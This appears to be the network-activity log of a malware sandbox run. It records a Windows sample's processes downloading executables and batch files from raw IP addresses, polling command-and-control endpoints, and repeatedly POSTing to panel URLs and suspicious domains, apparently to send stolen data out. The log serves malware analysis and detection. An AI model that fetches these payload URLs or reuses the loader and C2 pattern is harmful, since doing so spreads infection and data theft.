HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 25 Mar 2025 18:10:04 GMT
ETag: "119c00-6312ea1425700"
Accept-Ranges: bytes
Content-Length: 1154048
Content-Type: application/x-msdos-program
GET

http://185.156.73.98/info

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/update

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:40 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:42 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:44 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:48 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:53 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:55 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.169.46
POST

https://play.google.com/log?hasfast=true&authuser=0&format=json

firefox.exe

Remote address:

172.217.169.46:443

Request

POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
content-type: text/plain;charset=UTF-8
content-length: 739
origin: https://consent.youtube.com
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.169.46
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:818::200e

176.113.115.7:80

http://176.113.115.7/mine/random.exe

http

powershell.exe

36.3kB
1.9MB
763
1376

HTTP Request

GET http://176.113.115.7/mine/random.exe

HTTP Response

200
176.113.115.6:80

http://176.113.115.6/Ni9kiput/index.php

http

rapes.exe

6.2kB
7.8kB
48
31

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200

HTTP Request

POST http://176.113.115.6/Ni9kiput/index.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/test/amnew.exe

http

rapes.exe

8.4kB
452.7kB
182
327

HTTP Request

GET http://185.215.113.16/test/amnew.exe

HTTP Response

200
185.215.113.209:80

http://185.215.113.209/Di0Her478/index.php

http

futors.exe

1.6kB
1.5kB
17
8

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/off/random.exe

http

rapes.exe

307.1kB
18.4MB
6645
13198

HTTP Request

GET http://176.113.115.7/test/exe/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/test/am_no.bat

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/7001656225/Rm3cVPI.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/rast333a/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/7033027882/TbV75ZR.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/6691015685/hYjiwV0.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/8104437623/EPTwCQd.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/5163778194/7IIl2eE.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/1781548144/8BNn7ce.bat

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/teamex_support/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/luma/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/steam/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/well/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/off/random.exe

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/files/unique2/random.exe

http

futors.exe

162.5kB
9.5MB
3518
6798

HTTP Request

GET http://176.113.115.7/files/martin2/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/files/unique2/random.exe

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/mine/random.exe

http

powershell.exe

33.9kB
1.9MB
727
1374

HTTP Request

GET http://176.113.115.7/mine/random.exe

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/mine/random.exe

http

powershell.exe

31.8kB
1.9MB
690
1374

HTTP Request

GET http://176.113.115.7/mine/random.exe

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

Rm3cVPI.exe

3.1kB
5.3kB
13
14

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

Rm3cVPI.exe

2.1kB
4.2kB
10
10

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

oreheatq.live

tls

Rm3cVPI.exe

1.1kB
4.2kB
9
9
185.156.73.98:80

http://185.156.73.98/success?substr=mixfour&s=three&sub=none

http

svchost015.exe

696 B
416 B
6
5

HTTP Request

GET http://185.156.73.98/success?substr=mixfour&s=three&sub=none

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/service

http

svchost015.exe

8.2kB
106.9kB
71
103

HTTP Request

GET http://185.156.73.98/info

HTTP Response

200

HTTP Request

GET http://185.156.73.98/update

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/service

http

svchost015.exe

8.6kB
107.0kB
71
104

HTTP Request

GET http://185.156.73.98/success?substr=mixthree&s=three&sub=none

HTTP Response

200

HTTP Request

GET http://185.156.73.98/info

HTTP Response

200

HTTP Request

GET http://185.156.73.98/update

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

Passwords.com

3.1kB
5.3kB
14
14

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

Passwords.com

2.1kB
3.7kB
10
10

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

Passwords.com

1.1kB
4.2kB
9
9

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

d744367ecb.exe

3.1kB
5.3kB
14
13

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

5cf0a9b56c.exe

3.1kB
4.7kB
14
12

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

d744367ecb.exe

2.1kB
4.2kB
10
10

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

5cf0a9b56c.exe

2.1kB
3.7kB
10
10

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

5cf0a9b56c.exe

1.1kB
4.2kB
9
9

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
104.21.25.9:443

https://advennture.top/GKsiio

tls, http

d744367ecb.exe

1.1kB
4.2kB
9
9

HTTP Request

POST https://advennture.top/GKsiio

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/ycl

http

svchost015.exe

77.5kB
3.4MB
1552
2469

HTTP Request

GET http://185.156.73.98/ycl

HTTP Response

200

HTTP Request

GET http://185.156.73.98/ycl

HTTP Response

200
45.93.20.28:80

http://45.93.20.28/85a1cacf11314eb8.php

http

57dbff855a.exe

720 B
625 B
5
5

HTTP Request

GET http://45.93.20.28/

HTTP Response

200

HTTP Request

POST http://45.93.20.28/85a1cacf11314eb8.php

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/ycl

http

svchost015.exe

74.3kB
3.4MB
1546
2478

HTTP Request

GET http://185.156.73.98/ycl

HTTP Response

200

HTTP Request

GET http://185.156.73.98/ycl

HTTP Response

200
127.0.0.1:50269

firefox.exe
127.0.0.1:50275

firefox.exe
172.217.16.238:443

youtube.com

firefox.exe

52 B
1
172.217.16.238:443

https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

tls, http2

firefox.exe

2.1kB
10.1kB
17
23

HTTP Request

GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

HTTP Request

GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
142.250.200.14:443

www.youtube.com

tls

firefox.exe

977 B
6.9kB
10
8
142.250.187.206:443

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

tls, http2

firefox.exe

3.2kB
75.7kB
39
65

HTTP Request

GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
34.120.5.221:443

https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30

tls, http2

firefox.exe

1.7kB
12.7kB
12
18

HTTP Request

GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
142.250.180.4:443

https://www.google.com/favicon.ico

tls, http2

firefox.exe

1.8kB
7.5kB
15
17

HTTP Request

GET https://www.google.com/favicon.ico
185.156.73.98:80

http://185.156.73.98/success?substr=mixthree&s=three&sub=none

http

svchost015.exe

693 B
412 B
6
5

HTTP Request

GET http://185.156.73.98/success?substr=mixthree&s=three&sub=none

HTTP Response

200
107.174.192.179:80

http://107.174.192.179/app/u75a1_003.exe

http

rapes.exe

17.2kB
1.4MB
353
971

HTTP Request

GET http://107.174.192.179/app/u75a1_003.exe

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/success?substr=mixfour&s=three&sub=none

http

svchost015.exe

692 B
412 B
6
5

HTTP Request

GET http://185.156.73.98/success?substr=mixfour&s=three&sub=none

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/service

http

svchost015.exe

7.0kB
106.6kB
44
100

HTTP Request

GET http://185.156.73.98/info

HTTP Response

200

HTTP Request

GET http://185.156.73.98/update

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/files/fate/random.exe

http

rapes.exe

19.4kB
1.2MB
377
855

HTTP Request

GET http://176.113.115.7/files/fate/random.exe

HTTP Response

200
185.156.73.98:80

http://185.156.73.98/service

http

svchost015.exe

7.8kB
106.6kB
66
99

HTTP Request

GET http://185.156.73.98/info

HTTP Response

200

HTTP Request

GET http://185.156.73.98/update

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200

HTTP Request

GET http://185.156.73.98/service

HTTP Response

200
172.217.169.46:443

https://play.google.com/log?hasfast=true&authuser=0&format=json

tls, http2

firefox.exe

2.6kB
8.6kB
15
19

HTTP Request

POST https://play.google.com/log?hasfast=true&authuser=0&format=json

8.8.8.8:53

galarona.bet

dns

Rm3cVPI.exe

58 B
124 B
1
1

DNS Request

galarona.bet
8.8.8.8:53

oreheatq.live

dns

5cf0a9b56c.exe

59 B
91 B
1
1

DNS Request

oreheatq.live

DNS Response

172.67.172.183

104.21.30.96
8.8.8.8:53

TRnueDLgiwI.TRnueDLgiwI

dns

Passwords.com

69 B
144 B
1
1

DNS Request

TRnueDLgiwI.TRnueDLgiwI
8.8.8.8:53

advennture.top

dns

d744367ecb.exe

60 B
92 B
1
1

DNS Request

advennture.top

DNS Response

104.21.25.9

172.67.221.138
8.8.8.8:53

esccapewz.run

dns

d744367ecb.exe

118 B
127 B
2
1

DNS Request

esccapewz.run

DNS Request

esccapewz.run
8.8.8.8:53

travewlio.shop

dns

d744367ecb.exe

60 B
117 B
1
1

DNS Request

travewlio.shop
8.8.8.8:53

touvrlane.bet

dns

d744367ecb.exe

59 B
125 B
1
1

DNS Request

touvrlane.bet
8.8.8.8:53

wxayfarer.live

dns

5cf0a9b56c.exe

60 B
128 B
1
1

DNS Request

wxayfarer.live
8.8.8.8:53

sighbtseeing.shop

dns

d744367ecb.exe

63 B
120 B
1
1

DNS Request

sighbtseeing.shop
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

172.217.16.238
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

65 B
131 B
1
1

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

getpocket.cdn.mozilla.net

dns

firefox.exe

142 B
174 B
2
1

DNS Request

getpocket.cdn.mozilla.net

DNS Request

getpocket.cdn.mozilla.net

DNS Response

34.120.5.221
8.8.8.8:53

youtube.com

dns

firefox.exe

114 B
73 B
2
1

DNS Request

youtube.com

DNS Request

youtube.com

DNS Response

172.217.16.238
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

164 B
98 B
2
1

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
172.217.16.238:443

youtube.com

https

firefox.exe

3.3kB
9.3kB
8
10
8.8.8.8:53

www.youtube.com

dns

firefox.exe

61 B
319 B
1
1

DNS Request

www.youtube.com

DNS Response

142.250.200.14

142.250.178.14

172.217.169.78

142.250.187.206

216.58.212.206

216.58.204.78

216.58.212.238

216.58.201.110

172.217.169.14

172.217.16.238

142.250.187.238

142.250.179.238

142.250.200.46

142.250.180.14
142.250.200.14:443

www.youtube.com

https

firefox.exe

3.6kB
9.4kB
11
11
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.187.206
142.250.187.206:443

consent.youtube.com

https

firefox.exe

4.0kB
10.4kB
9
14
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
85 B
1
1

DNS Request

youtube.com

DNS Response

2a00:1450:4009:821::200e
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

44.240.131.83

54.213.200.248

44.227.3.195
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
122 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:c47c::
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
293 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

216.58.212.238

142.250.200.14

142.250.187.238

142.250.179.238

216.58.212.206

216.58.201.110

142.250.180.14

142.250.178.14

172.217.169.14

172.217.16.238

216.58.204.78

142.250.200.46

142.250.187.206

172.217.169.78
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.187.206
8.8.8.8:53

prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.120.5.221
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
181 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:81d::200e

2a00:1450:4009:81e::200e

2a00:1450:4009:80b::200e

2a00:1450:4009:819::200e
8.8.8.8:53

prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
110 B
1
1

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:524c::
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

consent.youtube.com

DNS Response

2a00:1450:4009:81f::200e
8.8.8.8:53

